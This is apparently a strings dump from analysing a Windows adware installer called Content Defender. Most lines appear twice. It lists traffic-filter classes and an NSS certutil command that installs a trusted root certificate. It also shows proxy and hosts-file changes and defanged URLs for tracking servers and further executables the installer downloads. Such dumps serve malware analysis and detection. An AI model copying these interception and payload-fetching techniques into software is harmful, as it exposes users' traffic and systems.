.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@
.?AVHttpFilter@@
.?AVHttpFilter@@
.?AVCUrlChecker@@
.?AVCUrlChecker@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
200075929
200075929
%Program Files%\Content Defender\cd.exe
%Program Files%\Content Defender\cd.exe
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'
val ServerExecutable = s '%MODULE_RAW%'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'
&iTXtXML:com.adobe.xmp
&iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
stdole2.tlbWWW
stdole2.tlbWWW
Created by MIDL version 7.00.0555 at Fri Dec 11 20:39:45 2015
Created by MIDL version 7.00.0555 at Fri Dec 11 20:39:45 2015
9%9/999]9
9%9/999]9
4 5*595}5
4 5*595}5
5!5%5)5-5
5!5%5)5-5
0!0-030A0M0S0a0g0q0}0
0!0-030A0M0S0a0g0q0}0
8 8(808
8 8(808
sOLEAUT32.DLL
sOLEAUT32.DLL
C{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
C{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
combase.dll
combase.dll
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
\*.cer
\*.cer
\cert.db
\cert.db
\x.db
\x.db
\xtls.db
\xtls.db
\xv.db
\xv.db
nss\certutil -A -t "TCu" -i "
nss\certutil -A -t "TCu" -i "
opcacrt6.dat
opcacrt6.dat
ca-certs
ca-certs
%Program Files%\Content Defender\cert
%Program Files%\Content Defender\cert
1.18.0.1
1.18.0.1
ContentDefender.exe
ContentDefender.exe
ASIns.exe_388:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
tware\Microsoft\Windows\CurrentVersion\Internet Settings
tware\Microsoft\Windows\CurrentVersion\Internet Settings
EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
adm\LOCALS~1\Temp\nsk4.tmp\inetc.dll
adm\LOCALS~1\Temp\nsk4.tmp\inetc.dll
KERNEL32.DLL
KERNEL32.DLL
MD5DLL.dll
MD5DLL.dll
System.dll
System.dll
callback%d
callback%d
`.data
`.data
@.reloc
@.reloc
SIZE %s
SIZE %s
REST %d
REST %d
FtpGetFileSize
FtpGetFileSize
Proxy-authorization: basic %s
Proxy-authorization: basic %s
Authorization: basic %s
Authorization: basic %s
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Content-Length: %d
FtpCommandA
FtpCommandA
%s:%s
%s:%s
%u bytes
%u bytes
%u kB
%u kB
%u MB
%u MB
%s - %s
%s - %s
%d:d:d
%d:d:d
/password
/password
Filename: %s
Filename: %s
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
(Err=%d)
(Err=%d)
Uploading %s
Uploading %s
D$%SP
D$%SP
t.UWh
t.UWh
USER32.DLL
USER32.DLL
COMCTL32.DLL
COMCTL32.DLL
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpEndRequestA
HttpEndRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpSendRequestA
HttpSendRequestA
InternetCrackUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestExA
HttpSendRequestExA
WININET.DLL
WININET.DLL
INetC.dll
INetC.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
B`.rdl
B`.rdl
.qWOG
.qWOG
`7J.Lv
`7J.Lv
Y'Ã
Y'Ã
x#i.Hu
x#i.Hu
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7.tmp
nsv7.tmp
nsv7.tmp
~1\Temp\nsk4.tmp
~1\Temp\nsk4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqC.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqC.tmp
hXXp://counter99.com/Generic/pixl.php
hXXp://counter99.com/Generic/pixl.php
/count.php
/count.php
-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9
ASIns.exe
ASIns.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp
hXXp://livestatscounter.com/SysInfo/reportstatus.php?uid=
hXXp://livestatscounter.com/SysInfo/reportstatus.php?uid=
hXXp://livestatscounter.com/SysInfo/count_vn.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vn.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vc.php?ch=test
hXXp://livestatscounter.com/SysInfo/count_vc.php?ch=test
hXXp://livestatscounter.com/SysInfo/glob.php?ch=test&sof=4
hXXp://livestatscounter.com/SysInfo/glob.php?ch=test&sof=4
hXXp://dml07j8fsmdyl.cloudfront.net/VOsrv.exe
hXXp://dml07j8fsmdyl.cloudfront.net/VOsrv.exe
hXXp://d3b98uxelh2q3f.cloudfront.net/runasu.exe
hXXp://d3b98uxelh2q3f.cloudfront.net/runasu.exe
hXXp://d1mdi78qyff344.cloudfront.net/JOSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/JOSrv.exe
hXXp://VVV.livestatscounter.com/SysInfo/hpstats.php
hXXp://VVV.livestatscounter.com/SysInfo/hpstats.php
hXXp://livestatscounter.com/vuupc/stats.php
hXXp://livestatscounter.com/vuupc/stats.php
hXXp://VVV.vuupc.com/download_exe.php?sid=
hXXp://VVV.vuupc.com/download_exe.php?sid=
hXXp://VVV.download-servers.com/vuupc/dl.php?r=vu_vo2_
hXXp://VVV.download-servers.com/vuupc/dl.php?r=vu_vo2_
hXXp://VVV.anyprotect.com/dl.php?pr=sc&r=vu_vo2_i_
hXXp://VVV.anyprotect.com/dl.php?pr=sc&r=vu_vo2_i_
hXXp://d1mdi78qyff344.cloudfront.net/WinCheckSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/WinCheckSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/ConvertAdSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/ConvertAdSetup.exe
hXXp://VVV.download-servers.com/SysInfo/igsSetupSingle.exe
hXXp://VVV.download-servers.com/SysInfo/igsSetupSingle.exe
hXXp://d1mdi78qyff344.cloudfront.net/SFSetup.exe
hXXp://d1mdi78qyff344.cloudfront.net/SFSetup.exe
hXXp://livestatscounter.com/vuupc/dl.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dl.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dljo.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dljo.php?r=vu_vo2_
hXXp://livestatscounter.com/countstats/count.php
hXXp://livestatscounter.com/countstats/count.php
hXXp://livestatscounter.com/vuupc/dls.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dls.php?r=vu_vo2_
hXXp://d1mdi78qyff344.cloudfront.net/IGSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/IGSrv.exe
hXXp://livestatscounter.com/SysInfo/affiliate_stats.php
hXXp://livestatscounter.com/SysInfo/affiliate_stats.php
hXXp://d1mdi78qyff344.cloudfront.net/CASrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/CASrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/SU_Srv.exe
hXXp://d1mdi78qyff344.cloudfront.net/SU_Srv.exe
hXXp://d1mdi78qyff344.cloudfront.net/Update_Notifier.exe
hXXp://d1mdi78qyff344.cloudfront.net/Update_Notifier.exe
hXXp://config.anysend.com/dlbase.path
hXXp://config.anysend.com/dlbase.path
hXXp://d1mdi78qyff344.cloudfront.net/AWSrv.exe
hXXp://d1mdi78qyff344.cloudfront.net/AWSrv.exe
hXXp://mobilitydata5.com/vuupc/dlswe.php?r=WE_ASWD
hXXp://mobilitydata5.com/vuupc/dlswe.php?r=WE_ASWD
hXXp://livestatscounter.com/vuupc/dle.php?r=vu_vo2_
hXXp://livestatscounter.com/vuupc/dle.php?r=vu_vo2_
hXXp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe
hXXp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
netsh winhttp reset proxy
netsh winhttp reset proxy
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
%WinDir%\System32\drivers\etc\hosts
%WinDir%\System32\drivers\etc\hosts
127.0.0.1 VVV.czzsyzgm.com
127.0.0.1 VVV.czzsyzgm.com
Nullsoft Install System v2.46
Nullsoft Install System v2.46
VVV.fdos.org
VVV.fdos.org
0.5.0-0
0.5.0-0
md5dll.dll
md5dll.dll
1.0.5.2
1.0.5.2
inetc.dll
inetc.dll